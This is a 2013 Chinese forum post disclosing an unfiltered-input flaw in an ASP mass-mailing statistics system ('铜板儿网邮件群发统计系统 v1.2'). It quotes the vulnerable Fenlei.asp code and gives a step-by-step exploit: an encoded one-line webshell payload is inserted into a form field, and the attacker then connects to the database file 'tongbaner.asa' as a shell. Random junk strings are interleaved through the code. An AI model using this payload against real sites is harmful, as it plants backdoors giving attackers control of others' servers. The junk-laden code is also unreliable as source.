找回密码
 立即注册
查看: 2846|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
* p: q( {/ w) s
- M/ t  U7 _" I6 ^7 k* vIF Request.QueryString("Action")="del" Then * U/ K7 [" R$ o) k0 Q, C5 b
ID=Request.QueryString("ID")   n' G! A8 z, t
IF Countss ("tui","Fenlei",ID )<>0 then
* \+ n8 A& _# A& a/ {( z+ {'略 / ~5 s9 Z! w& F- H! r+ i! A
IF Request.QueryString("Action")="Add" Then ; N5 Q7 d' ~9 o- z& w  s
Tname=Request.Form("Typename")
* H. T" I3 R" ySet Rs=Server.CreateObject("adodb.Recordset") ; v" [1 R! b6 D; l8 a
Sql="Select * From Fenlei Order by id Desc "
2 p6 }, T- V7 V2 \6 ]% u8 D6 O8 {Rs.Open Sql,Conn,1,3
( b: q: _1 \( W  d+ @/ ]Rs.Addnew & y' l8 n: _& o1 I# V( B
Rs("Typename")=Tname : c/ M3 j% l4 z& s5 e- i
'略 : v' n- l2 t7 j2 c
Set Rs=Server.CreateObject("adodb.Recordset")
) |' Y. B* S- jSql="Select * From Fenlei Order by id Desc "
& S+ W2 p3 r; i# X) NRs.Open Sql,Conn,1,1 $ {+ F( _% _1 W# |
'略
1 n% V3 f3 `2 U9 A0 u$ b& ?5 o; E%>
3 Q, q9 ^7 q: _( p- ^: X# h& l ! E; w/ J  f) S5 I% T3 M
7 F8 v6 e* i- r/ O$ y" T- O8 D5 X

  D: c5 r' B$ z+ f. M  h# t& l没有过滤,直接写入数据库。
; ?( s. Y0 s' {! S0 b # G  Z0 t+ w* H
利用方法:
  s4 _, w4 U1 X  t  n4 w ) ]- `4 K% j# P$ v" Y4 }
插入:┼攠數畣整爠煥敵瑳∨≡┩>7 `1 g6 s8 n* l( b$ L" g" w

! v% Y% o" P3 M( W  K5 F% o9 a, s - ~5 g, D( w! b( V7 e& y, j
连接: http://www.xxx.com/###tongbaner.asa
) U( p" ^, t5 ?; {# |'默认安装文件: , K; V3 z/ A5 V& N; T2 U7 H# R- V
'install.asp
# t$ C; [9 x$ Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表